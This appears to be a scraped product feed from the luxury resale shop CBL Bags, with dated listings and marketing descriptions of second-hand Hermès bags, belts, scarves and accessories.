La entrada Hermès se publicó primero en CBL Bags.

]]>
Hermès Handbag https://www.cblbags.com/en/p/hermes-handbag/ Thu, 18 Jul 2019 11:12:14 +0000 https://www.cblbags.com/?post_type=product&p=29026 A wonderful Hermès Birkin 35 bag  with soft and resistant Togo skin in Curry color. Combines a spacious interior. It is a deluxe complement perfect for city and travel.

 

La entrada Hermès Handbag se publicó primero en CBL Bags.

]]>
This classic Hermès Birkin 35 bag is crafted in Curry color Togo skin and combined with gold-tone hardware. It has all the features of a Hermès Birkin: the triangular shape, the flap with three partitions and strap clasp, double handle and reinforced bottom with metallic feet. The interior, crafted in the same tone goatskin leather, includes a wall pocket and a zippered pocket.  In CBL Bags we are experts on the purchase and sale of luxury bags. Contact us!

La entrada Hermès Handbag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-constance-elan-25/ Fri, 05 Jul 2019 15:47:25 +0000 https://www.cblbags.com/?post_type=product&p=28506 This Hermès Constance Elan 25 is waiting for you! Compact in size and crafted in exquisite epsom leather and vibrant Rose Tyrien color with palladium hardware, it's the perfect match for your daytime or evening social events.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Fashion and luxury bags, a tandem called Hermès! One of the most iconic brands, Hermès is forever associated with sophistication, extraordinary craftmanship and tradition.

At CBL Bags we buy and sell luxury bags. This time we present you with the perfect summer bag, the Hermès Constance Elan 25, crafted in Epsom leather and a vibrant Rose Tyrien color with palladium hardware. Hermès is always avant-guard and includes colors like this shocking pink to its traditional pallet. Its compact size makes it ideal for evening wear as well as daytime use. It can be worn on the shoulder or crossbody. Its exterior is in very good condition; its interior presents small stains and the palladium closure shows soft scratches.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-herbag/ Mon, 29 Apr 2019 10:22:46 +0000 https://www.cblbags.com/?post_type=product&p=27974 Presented for the first time in 2009 as a new version of the Herbag, this bag has an amazing resemblance with the famous Kelly bag.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Selling Hermès bags

At CBL Bags we buy and sell luxury bags like this unmatched Hermès Herbag Zip bag. Crafted in canvas and leather  the Herbag Zip in the classic trapeze body and front flap with a different closure. It has a Kelly lock and inside includes a small dettachable bag with flat zipper. The bag has an exterior back flap with zipper. This top-of-the-line style is a must for you.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès belt https://www.cblbags.com/en/p/hermes-belt-h-chamonix-calf-black-brown-golden-buckle/ Thu, 14 Mar 2019 11:45:12 +0000 https://www.cblbags.com/?post_type=product&p=27596 This is a perfect belt for men with class providing elegance and distinction to all your sets.

La entrada Hermès belt se publicó primero en CBL Bags.

]]>
Buy Hermès accessories

This men’s belt of the Hermès house is made in black calfskin leather on one side and Chamonix chocolate brown leather on the other. It is a reversible belt with 6 holes for a medium size. The model H buckle comes in gold. In CBL Bags we are experts in luxury accessories like this Hermès belt.

La entrada Hermès belt se publicó primero en CBL Bags.

]]>
Hermès Belt https://www.cblbags.com/en/p/hermes-belt-2h-calf-togo-paladium/ Thu, 14 Mar 2019 11:05:28 +0000 https://www.cblbags.com/?post_type=product&p=27544 This sophisticated mens belt will bring elegance and distinction to your best outfits as well as to your more sporty outfits.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Buy Hermès belt

In CBL Bags we are not only experts in second-hand luxury bags but we also specialize in other luxury accessories like this Hemès belt. This piece is made of Box Calf leather, black on one side and on the other, in Togo leather, in Gold. This makes the belt reversible, being able to use it on both sides indistinctly, according to the clothes to be combined. The elegant H buckle is made in palladium, with three holes for a medium size.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-kelly-35/ Wed, 13 Mar 2019 11:09:46 +0000 https://www.cblbags.com/?post_type=product&p=27419 This Kelly 35 bag by Hermès in color white is a collector's item hard to find.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Sell luxury handbags

This magnificent Hermès Kelly 35 bag is crafted of resistant Togo leather in delicate white color, combined with palladium hardware. It has a handle to carry at hand and a removable shoulder strap to be able to carry it on the shoulder. The top flap, with the typical turn closure of the house, opens to a large interior that includes a zippered pocket and two open pockets for better organization of the contents. Like all bags of the Kelly family, it has four metal feet at its base ( also known as “Clou”). In CBL Bags we are dedicated to buying and selling bags of luxury brands like this unique Kelly 35 by Hermès.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-30-togo-leather-blue-ocean/ Thu, 24 Jan 2019 11:09:51 +0000 https://www.cblbags.com/?post_type=product&p=26904 This wonderful Hermès Birkin 30 bag in blue ocean is a sure bet of timeless elegance.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Purchase luxury bags

In CBL Bags we are experts in buying and selling luxury bags from brands such as Hermès. This Hermès Birkin bag 30 is crafted of Togo leather in blue ocean color. The Togo leather is characterized for being a grainy, textured and anti-scratch. The palladium fittings contrast with the depth of the blue ocean color, giving a touch of elegance and distinction. Like all Hermès Birkin bags, it has two leather handles to carry, and the typical tripartite flap that opens to a spacious interior with two pockets, one zippered and one open. This Birkin 30 bag from Hermès comes with the tirette and the clochette, in addition to its dust cover.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-birkin-bag-35-fjord-leather/ Wed, 23 Jan 2019 16:22:20 +0000 https://www.cblbags.com/?post_type=product&p=26958 A wonderful Birkin bag 35 by Hermès with soft and resistant Fjord skin in a fresh color as theTurquoise blue is. A bag that will give an elegant touch to your most casual outfits.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Purchase of luxury bags.

This classic Hermes Birkin bag 35 is made of Fjord skin in Turquoise blue color combined with palladium hardware. The fjord leather of this Birkin bag 35 has a very soft texture to the touch and the outside is completely water resistant. Like all of their kind it features the triangular shape, the flap with three partitions and strap clasp, double handle and reinforced bottom with metallic feet. The interior, crafted of tonal goatskin leather, includes a wall pocket and a zippered pocket.  In CBL Bags we are experts on the purchase and sale of luxury bags. Contact us!

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-35-togo-leather-taupe/ Mon, 21 Jan 2019 12:16:46 +0000 https://www.cblbags.com/?post_type=product&p=26906 This Hermès Birkin 35 bag in versatile color as the taupe with white contrast stitching is elegant and sporty.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Buy Hermès bag

This Birkin 35 bag by Hermès is made of Togo leather in Taupe color. The Togo leather is granulated, soft and is easy to care. The color Taupe is a neutral color that, combined with the palladium fittings, allows it to be an easy bag to wear with all your clothes. It consists of two handles to carry the bag by hand and the characteristic tripartite flap with the typical closure of the house. In its spacious interior includes two pockets, one with zipper and one open. In the base has four metallic feet to protect the bag. In CBL Bags we are dedicated to buying and selling bags of luxury brands like this unique bag Birkin 35 Hermès.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès handbag https://www.cblbags.com/en/p/hermes-bag-birkin-35-leather-havane/ Fri, 21 Dec 2018 11:27:43 +0000 https://www.cblbags.com/?post_type=product&p=26200 Combining a roomy interior with a water and scratching resistant leather, this Birkin 35 is a perfect handbag for heavy use in the city.

La entrada Hermès handbag se publicó primero en CBL Bags.

]]>
This classic Hermes Birkin bag is crafted of Havane Buffalo Skipper leather combined with gold-tone hardware. This soft grained leather is ideal for heavy use as it is water resistant and scratches are easily buffed out. As all Birkin bags, it features double top handle, a front flap and 4 studs to protect the base.

La entrada Hermès handbag se publicó primero en CBL Bags.

]]>
Hermès Belt https://www.cblbags.com/en/p/hermes-belt-constance-leather-black-gold-palladium-hardware/ Mon, 17 Dec 2018 16:28:08 +0000 https://www.cblbags.com/?post_type=product&p=25407 This Hermès men's belt with the classic Cosntance buckle in palladium is reversible, which makes it the best complement to combine elegantly with any outfit.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Sale of Hermès accessories
We present this Hermès Constance belt for men. A reversible piece made of Box Calf and Chamonix leather in Gold and black. The buckle in H shape is made of palladium, with three holes for a medium size. This belt comes with its original packaging, the legendary Hermès orange box, the original paper and a mini dust-bag to keep the buckle at its best.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-40-togo-leather/ Wed, 12 Dec 2018 10:42:29 +0000 https://www.cblbags.com/?post_type=product&p=26089 The classic Hermès Birkin bag is one of the most wanted. In this opportunity, we present it in size 40 crafted of one of its most unique tones, the Iris color. Similar to the other purple tones like Violet and Raisin, this elegant purple exudes sensuality and amplifies your casual style. A classic and at the same time different version to stand out in any place!

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Buy and sell Hermes handbags

This Hermès Birkin handbag is made of Togo leather in the exceptional Iris color. The Togo skin is characterized by its resistance to scratches and dirt, which makes it one of the most popular skins. Accented with palladium hardware, it has superior double roll handles, front flap and protective metallic base studs. Its spacious interior lined in purple leather includes zippered pocket and sliding pockets perfect for the essentials of the day. This bag is preserved in a very good condition; it has been taken to Hermès SPA to erase its initials which were on top of the interior hardware. This Birkin 40 is definitely a youthful and fresh piece to add to your collection.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-birkin-35-handbag/ Tue, 04 Dec 2018 10:13:34 +0000 https://www.cblbags.com/?post_type=product&p=25994 This classic Hermès Birkin bag in such a versatile color adapts so well to any occasion that you won't want to leave the house without it.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Purchase & sale Hermes handbags

This timeless Hermes Birkin bag in size 35 is crafted of Togo leather, one of the most popular and resistant to scratching Hermès leathers. Its Taupe color is accented with palladium hardware and white stitching. Like all Birkins, it shows a tripartite front flap with double top handles for a perfect hand carry; reinforced base with four metal feet and a matching interior with two pockets: one open and one with zipper.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-kelly-28-croco-handbag/ Fri, 23 Nov 2018 19:07:31 +0000 https://www.cblbags.com/?post_type=product&p=25349 The iconic Kelly bag by Hermès with exquisite crocodile skin is a divine bag for both day and night.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This elegant Kelly bag by Hermes is made of exotic crocodile skin accented by gold hardware. Like all of its range, this bag has a top handle, metallic feet to protect the base and a front flap that gives space to an interior made in a matching tone, which has two pockets, one with zipper and another double and plane. This gorgeous piece comes with a matching detachable shoulder strap, allowing for both hand or shoulder carrying, making this piece both durable and versatile. It’ss a must-have for any Hermès collector.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-40-clemence-leather-white-palladium-hardware/ Thu, 15 Nov 2018 17:40:40 +0000 https://www.cblbags.com/?post_type=product&p=25347 Mixing a stunning white color with its big size, this Birkin is not an easy piece ti find.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
In this occasion, the Birkin bag on its biggest size combines a flawless white color and palladium hardware. It is crafted of the classic Clemence leather, known by its scratches resistance and a soft mate finish, which makes this big bag perfect for a casual look. As always, the Birkin bag features top handles, a front flap and 4 studs to protect the base. It also features the classic Birkin closure and the tirette and clochette to hold the keys and padlock. Its roomy interior shows two pockets, one with zipper closure.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-40-togo-leather-plomb-palladium-hardware/ Thu, 15 Nov 2018 10:44:36 +0000 https://www.cblbags.com/?post_type=product&p=25346 The Hermès Birkin in size 40 allows you to carry everything you need for your day in an elegant and sophisticated way.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This classic Hermès Birkin 40 is made of Togo leather and accented with palladium hardware. Its Plomb color is versatile, so it allows you to combine it with any outfit. It has leather upper handles, a front flap, strap closure, 4 metallic studs to protect the base and a matching clochette and tirette to hold the padlock and keys. Its interior features two pockets, one open and one that closes with zipper for a good organization. Its large size will allow you to carry carefree all your belongings.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-kelly-32-gold-epsom-leather-bag/ Tue, 13 Nov 2018 17:09:01 +0000 https://www.cblbags.com/p/hermes-kelly-32-gold-epsom-leather-bag/ An Hermès iconic bag that is perfect for every day wear.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Crafted exquisitely by Hermès, this Kelly 32 combines gold-tone hardware and Gold Epsom leather. This leather has some very good benefits such as its lightweight and scratches resilience. As all Kellys, this handbag shows a top handle, 4 metallic studs to protect the base and a front flap that gives access to a matching-tone interior that features a double flat pocket.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-35-togo-gold-leather-golden-hardware/ Tue, 13 Nov 2018 10:19:55 +0000 https://www.cblbags.com/?post_type=product&p=25286 Sophisticated and elegant, the Hermès Birkin is one of the most coveted bags in the world.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The Birkin has already been proclaimed as the eternal Hermès classic. It comes in the coveted size 35. In its absolutely stunning golden color, this bag is perfect for any occasion. Made with Togo leather, it features the classic Birkin characteristics: upper handles, front flap, fastening strap, golden hardware and a front turn lock closure with a padlock and a matching clochette for the keys. Its interior features two pockets: one open and one that closes with zipper.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermes Belt https://www.cblbags.com/en/p/hermes-constance-h-black-box-calf-orange-togo-leather-belt/ Tue, 30 Oct 2018 12:32:54 +0000 https://www.cblbags.com/p/hermes-constance-h-black-box-calf-orange-togo-leather-belt/ A classic Hermes accessory that cheers up any casual outfit.

La entrada Hermes Belt se publicó primero en CBL Bags.

]]>
This classic Hermes Constance H belt is a reversible accessory that combines black Box Calf leather and orange Togo leather. It features a gold hardware H buckle and several buttonholes to adjust on your waist.

La entrada Hermes Belt se publicó primero en CBL Bags.

]]>
Hermès Scarf https://www.cblbags.com/en/p/hermes-scarf-faconnee-grand-h/ Mon, 08 Oct 2018 11:28:44 +0000 https://www.cblbags.com/p/hermes-scarf-faconnee-grand-h/ A perfect accessory for the cold days!

La entrada Hermès Scarf se publicó primero en CBL Bags.

]]>
This Hermès Façonnee Grand H Scarf is crafted of 75% silk and 25% wool. It features an H pattern in a dark tone of blue “Ocean 14”. It is preserved in a very good condition overall, and preserves its original folding. Including the original box and paper, it is also perfect as a gift!

La entrada Hermès Scarf se publicó primero en CBL Bags.

]]>
Hermès handbag https://www.cblbags.com/en/p/hermes-birkin-35-black-fjord-leather-and-palladium-hardware-handbag/ Fri, 28 Sep 2018 14:55:21 +0000 https://www.cblbags.com/p/hermes-birkin-35-black-fjord-leather-and-palladium-hardware-handbag/ A timeless roomy Birkin bag. The perfect match when you need capacity and elegance.

La entrada Hermès handbag se publicó primero en CBL Bags.

]]>
This Birkin in 35 centimeters is crafted of the resistant Fjord leather in black. It shows the classic three-parts flap with side tabs and a short double handle. In this case, we can see palladium plated hardware, which matches perfectly with the mate black tone of this handbag. Tonal lined interior with two patch pockets: an open one and a zippered close.

La entrada Hermès handbag se publicó primero en CBL Bags.

]]>
Hermès handbag https://www.cblbags.com/en/p/hermes-birkin-35-anis-green-ostrich-leather-handbag/ Mon, 09 Jul 2018 18:21:56 +0000 https://www.cblbags.com/?post_type=product&p=24043 Combining an exotic leather and a vibrant color, this Birkin 35 keeps the perfect balance.

La entrada Hermès handbag se publicó primero en CBL Bags.

]]>
This classic handbag from Hermès is crafted of ostrich leather and palladium hardware. Its anis green color plus the ostrich leather texture gives this bag a marvelous harmony. On 35 centimeters, this bag features all the Birkin characteristics: double handle, a tripartite front flap, base studs and a roomy interior lined in a matching color. This Birkin 35 from 2004 preserves itself in a really good condition, showing only some extremely soft scuffing on hardware.

La entrada Hermès handbag se publicó primero en CBL Bags.

]]>
Hermès Handbag https://www.cblbags.com/en/p/hermes-birkin-handbag-white-clemence-leather/ Wed, 13 Jun 2018 11:56:18 +0000 https://www.cblbags.com/?post_type=product&p=23827 Made of neutral size and colors, this Birkin 35 is a wardrobe essential.

La entrada Hermès Handbag se publicó primero en CBL Bags.

]]>
It is crafted of the popular Clemence leather in white color. This baby bull leather is a very resistant material and in this occasion, it is combined with plated palladium hardware. Despite of its delicate color, this Birkin 35 preserves itself in a good condition overall; it shows some usage marks on exterior and mostly on interior, and its hardware presents some soft scuffing. Made in 2005, it includes dustbag, mini dustbag, tirette, clochette, padlock and keys.

La entrada Hermès Handbag se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/hermes-carre-wa-ko-ni/ Fri, 12 Jan 2018 16:50:16 +0000 https://www.cblbags.com/?post_type=product&p=15512 Combining vibrant colors as blue, violet and green; and the beauty that silk provides, this Hermès carré is perfect to wear in any occasion.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
This beautiful Hermès silk carré features a background full of details contrasted with the amazing portrait of the Native American Princess ‘Wa’Ko-Ni’.  More than 46 colors were used in the creation process of this special scarf where we can find shades of vibrant green, violet, blue and ecru tones.Lead by the illustrator of the French house, Antoine Tzapoff, this design is one of the most marvelous Hermès’ recent pieces.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès Accessory https://www.cblbags.com/en/p/hermes-accessory-hermes-accessory-clic-clac-h-bracelet-palladium-black-2/ Fri, 12 Jan 2018 15:02:59 +0000 https://www.cblbags.com/?post_type=product&p=15501/ This Hermès black enamel bracelets with palladium plated finish is a classic and elegant piece. Light and versatile, goes with everything

La entrada Hermès Accessory se publicó primero en CBL Bags.

]]>
Iconic Bracelet from Hermès house. The Clic-Clac H takes its name from the H-shaped clasp. It has a thin band of palladium silver with a hinge on one side and opens with a swivel “H” on the other side. A band of black enamelwork covers the major part of the bracelet.

La entrada Hermès Accessory se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-firkin-30-taupe-togo/ Fri, 12 Jan 2018 13:06:55 +0000 https://www.cblbags.com/?post_type=product&p=15493/ This Hermès Birkin 30 is a traditional handbag that also can be as modern as you want! An unworn jewel in taupe Togo leather ready to join your collection...

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Classic and modern at the same time seems impossible but not for nothing is the Nº1 luxury brand in the world. In this opportunity Hermès brings us the traditional model in one of the most desired measures. This Birkin 30 is crafted of taupe Togo leather and palladium hardware. As we are used to, it features a front flap with three partitions and a strap clasp, double handle and reinforced botton with metallic feet. The interior is made of tonal goatskin leather and includes the classic wall and zippered pocket.

 

 

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-birkin-30-sikkim-rouge-ash/ Tue, 17 Oct 2017 15:43:07 +0000 https://www.cblbags.com/?post_type=product&p=14833/ The most coveted, classic and timeless bag with the dream combination of its delicate, silky and souple rouge ash sikkim leather and golden harware. This Hermés Birkin is just pure temptation.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès has in the Birkin 30 centimeters one of most wanted bags. This Birkin 30 is made of the silky sikkim leather, being just simply a treausure. Also, its color rouge ash is one of its main  features as it is an intense reddish color, full of brown hints. The bag has a shiny but dedicated finish. Golden hardware and, of course, the features which have made the Birkin the icon it is nowadays: triangular shape, the flap with three partitions and strap clasp, double handle and reinforced bottom with metallic feet. The interior, crafted of tonal goatskin leather, includes a wall pocket and a zippered pocket

 

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-birkin-25-croco-porosus-whisky-bag/ Fri, 06 Oct 2017 16:24:35 +0000 https://www.cblbags.com/?post_type=product&p=14796/ There are bags that are considered proper jewels pieces and this Hermès Birkin 25 made of porous crocodile is one of them. Its size and its exotic leather make this bag unique and simply exceptional.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Delicate and exquisite. This Hermès Birkin 25 made of porous crocodile in whisky color is truly a unique bag because its small size, complicated to find, and its excellent condition. This special Hermès piece has a soft shiny finish and, of course,  features which have made the Birkin the icon it is nowadays: triangular shape, the flap with three partitions and strap clasp, double handle and reinforced bottom with metallic feet. The interior, crafted of tonal goatskin leather, includes a wall pocket and a zippered pocket.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-birkin-bag-35-togo-leather-blue-jean/ Fri, 06 Oct 2017 10:32:48 +0000 https://www.cblbags.com/?post_type=product&p=14579/ A wonderful Birkin 35 bringing together a classic leather like Togo and the fresh, yet iconic Blue Jean color. Besides, the palladium hardware offers a youthful flair. Combine this bag with a pair of jeans and a soft blouse.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This Birkin 35 is crafted of classic Togo leather, the most recognizable grained leather from the French brand. The color is the Blue Jean, also an iconic color. It shows palladium hardware and, of course, the features which have made the Birkin the icon it is nowadays: triangular shape, the flap with three partitions and strap clasp, double handle and reinforced bottom with metallic feet. The interior, crafted of tonal goatskin leather, includes a wall pocket and a zippered pocket.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-kelly-pochette-minibag-evergrain-leather-black/ Wed, 20 Sep 2017 09:14:57 +0000 https://www.cblbags.com/?post_type=product&p=14485/ This Pochette version from the iconic Kelly dresses up in Evergrain leather and gold hardware. A delicious mini bag with a different and soft skin. Hermès candy.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This Kelly Pochette from Hermès is crafted of soft and delicate Evergrain leather in black color. The top handle and straight flap, along with the two tabs fixing this flap, are Kelly’s iconic features. However, this version is flatter, making of this Kelly Pochette a minibag baguette. Its gold-tone hardware matches smoothly and gives the perfect touch.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-29/ Mon, 18 Sep 2017 08:22:50 +0000 https://www.cblbags.com/?post_type=product&p=14449/ This bag is not only gorgeous but spacious enough to keep all your necessities in one place. Hermès conjugates in this Birkin one of its most famous leather, the barenia and its eternal Toile H canvas. Featuring silver hardware, this bag represents the very best of the French brand.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
A classic and an iconic fashion staple, the Birkin is a favorite among bag enthusiasts but if we talk about the Birkin made of leather and canvas, this style becomes the piece. This 35 cm features a mixture of Barenia leather in dark brown and Toile H canvas. Its characteristic flap with three partitions, double rolled handle, as well as, the matching clochette and tirette, are made of this amazing leather. The main body is made of the timeless ecru canvas that provides to its figure the stiffness of its silhouette. The interior, includes a wall pocket and a zippered pocket. This bag also features its famous triangular shape and it includes its four metallic feet at the bottom.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-birkin-bag-35-fjord-leather-chartreuse-green/ Thu, 14 Sep 2017 15:43:25 +0000 https://www.cblbags.com/?post_type=product&p=14407/ A great color from a special edition to match the supreme Fjord leather. Afterwards, the Birkin flair is all you need and, of course, your personal touch of style.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This Birkin 35 is crafted of durable Fjord leather, with nice vertical lines throughout the bag. The color is the Chartreuse green, a special edition for this palette that takes its name from the famous French herbs liquor. It shows golden hardware and, of course, the features which have made the Birkin the icon it is nowadays: triangular shape, the flap with three partitions and strap clasp, double handle and reinforced bottom with metallic feet. The interior, crafted of tonal goatskin leather, includes a wall pocket and a zippered pocket.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Accessory https://www.cblbags.com/en/p/hermes-accessory-collier-de-chien-bracelet-box-calf-gold/ Thu, 27 Jul 2017 11:04:30 +0000 https://www.cblbags.com/?post_type=product&p=14302/ One of the icons from the French brand. This Collier de Chien is, as a plus, crafted of Gold leather, signature Hermès' color. A must.

La entrada Hermès Accessory se publicó primero en CBL Bags.

]]>
Iconic accessory from the French brand. This Collier de Chien bracelet is crafted of Gold Box Calf leather and gold hardware. Its clasp consist of a series of slots where a piece of metal is inserted to lock the clasp and fix it with a metal loop afterwards. Its pyramid studs and metallic loop are the iconic ornamentals that define this model.

La entrada Hermès Accessory se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/hermes-carre-le-mors-a-la-conetable/ Thu, 13 Jul 2017 16:42:45 +0000 https://www.cblbags.com/?post_type=product&p=14700/ Signed by the designer and Hermès Artistic Director, Henri d'Origny, "Le Mors a la Conétable" first came out in the 70's. A sophisticated composition that turns this carré into an special one.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
In an intense but smooth red, this Hermés carré also combines its main color with a soft gold that makes it a perfect to accessorise any evening styling. Sophisticated and delicate at the same time, this silk carré hangs beautifully having also a very nice light. In perfect condition, it comes along with its Hermès orange box.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/hermes-carre-ex-libris-en-camouflage/ Mon, 10 Jul 2017 10:07:10 +0000 https://www.cblbags.com/?post_type=product&p=14144/ Geo-shaped horses and a color blend between warm and cold tonalities. All of this designed to conform the H from Hermès. This carré will rise up when you wear it.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
This Carré is a reinterpretation from the classic Ex-Libris French house design. It is, actually, a collector’s piece where dozens of equestrian shapes gallop throughout its tissue. Like a refined trompe l’oeil, part of these figures conform the H of Hermès, framed by a large dimension circle. It is a game for your senses and the perfect color blend with blue, yellow, orange and water blue tonalities.

 

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/14071/ Thu, 06 Jul 2017 10:53:35 +0000 https://www.cblbags.com/?post_type=product&p=14071/ Hermès explodes in a dense greenery in this carré signed by the illustrator A. Honoré. A beautiful rich flora and fauna are the main protagonist in this accessory that covers a range of amazing colors ...

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
It is an explosion of color. This beautiful carré of Hermès, Au Coeur de la Vie, is full of greenery and flowers as well as full of animals like butterflies and colorful parrots. The acid of its colder tones combines perfectly with the roses and violets tones of its flowers. In addition, to emphasize the effect of its colors, the carré is framed in black.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/hermes-carre/ Wed, 05 Jul 2017 11:00:12 +0000 https://www.cblbags.com/?post_type=product&p=14045/ With a refined and elegant print, this Hermés carré looks impeccable. An intense blue is combined with a stunning range of colours being ideal for every outfit you have in your closet.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
A Hermès carré is always magnificent. Made of an excellent silk, this 90 × 90 carré is decorated by a beautiful illustration that mixes multitude of flowers of different colors with big butterflies that can be nicely confused with colorful fans full of multiple prints. The main color is the blue combined with white, red and purple touches. The carré is framed with a thin green trim.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès Backpack https://www.cblbags.com/en/p/kelly-a-dos-box-calf-terre/ Fri, 23 Jun 2017 17:08:22 +0000 https://www.cblbags.com/?post_type=product&p=13540/ Superb vintage piece combining brown Box Calf leather and gold hardware. Amazingly well-preserved, this Hermès backpack is now more on fashion than ever.

La entrada Hermès Backpack se publicó primero en CBL Bags.

]]>
Hermès backpack Kelly  “À dos” in brown Terre Box Calf leather with gold hardware. This backpack version features two shoulder straps in brown canvas and a more narrow shape. Nevertheless, it still preserves Kelly renowned features like the closure tabs and top handle. The straight flap opens to an inside lined in goatskin leather including a double wall pocket and a zippered pocket.

La entrada Hermès Backpack se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-28/ Thu, 15 Jun 2017 17:47:39 +0000 https://www.cblbags.com/?post_type=product&p=13578/ Treat yourself by getting your hands on this gorgeous Hermès Birkin 35 Jaune color and made of Clémence leather. Its color is marvelous and it is combined with gold hardware, having as a result a breathtaking bag.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The color palette of Hermès seems to be infinite and when the color is alive in one of the most iconic bag, the Birkin, its pantones become terrific. This Birkin made of Clémence leather shows an incredible intense yellow “jaune” color that despite being acid, it combines perfectly with its gold hardware. This is indeed an intense color easy to combine with ècru, dark green or burgundy hints. A marvelous bag which in a mint condition.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-27/ Mon, 12 Jun 2017 15:34:18 +0000 https://www.cblbags.com/?post_type=product&p=13542/ This incredible piece is a Hermès Kelly 25. An exotic and delicate bag, greatly scrutinized to ensure perfection and made of a beautiful crocodile leather in a deep raspberry color. It marries luxury and elegance, and the result is a power bag.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The Hermès Kelly is a timeless style, but in this size is truly a temptation. Its 25 centimeters turn out this model in a incredible piece. Made of soft and delicate niloticus crocodile its color is a stunning deep raspberry which is combined with golden tone hardware. It comes along with crocodile leather strap, perfect to wear on shoulder. Mint condition, this bag is pristine.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Beach Bag https://www.cblbags.com/en/p/hermes-beach-bag-maxi-cabas-grands-fonds/ Mon, 29 May 2017 11:21:32 +0000 https://www.cblbags.com/?post_type=product&p=13296/ Great capacity bag inspired by the sea "Grands Fonds" with a multicolor motive. In 2017 Hermès collection. Includes pochette and removable bottom.

La entrada Hermès Beach Bag se publicó primero en CBL Bags.

]]>
Wonderful Beach Bag from Hermès Bain collection. Crafted of 100% cotton canvas, this bag has great capacity. It shows the Grands Fonds motif with two fish overlaid to an abstract pattern inspired by the reef barrier, both in color and shape: beige, orange, blues, emerald, fuchsia… Two large and flat handles are thought to carry this bag on your shoulder. Besides, it includes a pochette with tirette to keep your personal belongings and a removable interior bottom.

La entrada Hermès Beach Bag se publicó primero en CBL Bags.

]]>
